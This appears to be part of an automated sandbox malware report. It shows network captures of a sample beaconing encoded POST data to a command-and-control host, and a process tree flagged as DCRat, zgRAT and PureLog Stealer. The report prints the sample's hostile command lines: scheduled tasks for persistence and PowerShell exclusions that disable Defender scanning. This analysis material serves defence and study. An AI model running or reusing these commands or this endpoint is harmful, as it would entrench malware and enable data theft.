                                                  Aug 1, 2024 07:39:08.584150076 CEST1012OUTData Raw: 54 51 5d 55 5f 5e 5d 51 5c 5e 5a 51 54 51 57 54 57 51 5e 5d 56 5d 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQ]U_^]Q\^ZQTQWTWQ^]V]Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_$165Y'6/++&S)%-%;$&,6^$33/ !?^%&G#.X!
                                                  Aug 1, 2024 07:39:08.682543993 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:08.841764927 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:08 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vAdV4awD9AFspupzzY2Ml7c9yUMP4eg5Hg9fZYXlXdwzn8%2BxPjwbZiKEd046Kj2P%2FYYNaYUtBku0Efx%2Fuw9h8hjtgD70re1bwSQDtLt59L%2BQgWevLLENo842Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6afd931a1b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  144 | 192.168.2.4 | 49881 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:08.960954905 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:39:09.318627119 CEST1008OUTData Raw: 54 57 58 54 5a 5a 58 53 5c 5e 5a 51 54 56 57 51 57 52 5e 5e 56 5c 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWXTZZXS\^ZQTVWQWR^^V\Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$"+$%;X<()>-%+;V2?23/+_6+;]2&G#.X!,
                                                  Aug 1, 2024 07:39:09.406914949 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:09.648047924 CEST592INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTe%2BhQTXeV0K1JF4JM5X6EtpY0vd3Y%2BP3HKdDvIb7JUCCSkCdillVd3w%2B4lhqD5p48BM%2BDgJRPLT%2F%2Bt0XtoNV9EapfZVSY2%2Fgu7wyhWO9LbsblGfQJrqgMbXTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c6f8a7c43c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  145 | 192.168.2.4 | 49882 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:09.775793076 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:10.130913973 CEST1012OUTData Raw: 51 53 58 50 5a 58 58 57 5c 5e 5a 51 54 5f 57 5a 57 53 5e 5b 56 5f 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QSXPZXXW\^ZQT_WZWS^[V_QT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"329]58$/?8.T?&:&(2_&3 ,>]!87]&%&G#.X!
                                                  Aug 1, 2024 07:39:10.256299019 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:10.413655996 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilr2mBsXPcKJgAomkey1ZdbKvzxm3mNVXVjqBzzV3aZO2J9DsCno1NA%2Bu5zfe496TZE%2FuIzmJhWvvnxL7rZ0%2Fgr8sVjgKLjzCAKPE2zRf6vaecq3BJMsd0wrBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c74cec642e7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  146 | 192.168.2.4 | 49883 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:10.636734962 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:10.990411043 CEST1012OUTData Raw: 54 51 5d 51 5a 5e 58 53 5c 5e 5a 51 54 57 57 51 57 50 5e 5b 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQ]QZ^XS\^ZQTWWQWP^[V]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'""5[$]$$?)%&8',2X%3<W/'X#(/2&G#.X!
                                                  Aug 1, 2024 07:39:11.149471045 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:11.404432058 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SAci49NKXxwkrB%2BT5CVX0yEOx5AD0zTGgH9jD2KKgMeVVVFa3VACBKrCg%2BWETye55vEqLQBb5d1mTDT%2BJdm475G5HsYzxkud0p%2FiPpguq4O3XgXu21yXSCHVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c7a6ffc43a0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  147 | 192.168.2.4 | 49884 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:11.526123047 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:11.881086111 CEST1012OUTData Raw: 51 55 58 54 5a 58 58 55 5c 5e 5a 51 54 5e 57 52 57 5f 5e 56 56 55 51 54 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QUXTZXXU\^ZQT^WRW_^VVUQT[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$%"-Z05+)&&$&/6Z$3 R/.8#882&G#.X!
                                                  Aug 1, 2024 07:39:11.984519958 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:12.224046946 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60puzvnxsPTL3M6yboH%2F9GMD6AroNBflj0CSRPLLaPZA07ygiLYbUupyP8dcFDuTqg438VzPp%2BQZX7REqfBOmyz7HghUHqeIjHtvzSg74x0DP7oj3ZvpOBBU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c7f9c758ce0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  148 | 192.168.2.4 | 49885 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:12.465130091 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:39:12.825376034 CEST1012OUTData Raw: 54 51 58 55 5f 59 5d 57 5c 5e 5a 51 54 51 57 55 57 50 5e 56 56 54 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TQXU_Y]W\^ZQTQWUWP^VVTQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$)Z5[$&&3+5*6%28/S%,.Y&U(//";''%&G#.X!
                                                  Aug 1, 2024 07:39:12.919717073 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:39:13.161012888 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:39:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrbWRsS%2FhF4f9MqZA%2FUp3h1pdw%2F0OXffOT2g1H%2Bh0XGQTCZQ%2BlmFfgAvbcehiYoObroQ05rs60qpD%2BB66wds6PzFgEs65eKgSHIh7rJ6IU%2B%2FXxoXrk1wN2TRKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37c857f2f8cb3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  149 | 192.168.2.4 | 49886 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:39:13.291446924 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive



                                                  Target ID:0
                                                  Start time:01:37:08
                                                  Start date:01/08/2024
                                                  Path:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\UuIspZT5b6.exe"
                                                  Imagebase:0xca0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1853389921.0000000013345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1741158644.0000000000CA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline"
                                                  Imagebase:0x7ff652580000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:01:37:12
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"
                                                  Imagebase:0x7ff6b3dc0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Recovery\dllhost.exe
                                                  Imagebase:0xed0000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 55%, Virustotal
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Recovery\dllhost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Recovery\dllhost.exe
                                                  Imagebase:0xa20000
                                                  File size:1'879'040 bytes
                                                  MD5 hash:64483E064AA921F94D5B254601DB7C97
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:01:37:13
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "UuIspZT5b6U" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\UuIspZT5b6.exe'" /f
                                                  Imagebase:0x7ff76f990000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dllhost.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:27
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:29
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:32
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:33
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:35
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:36
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat"
                                                  Imagebase:0x7ff664eb0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:01:37:14
                                                  Start date:01/08/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
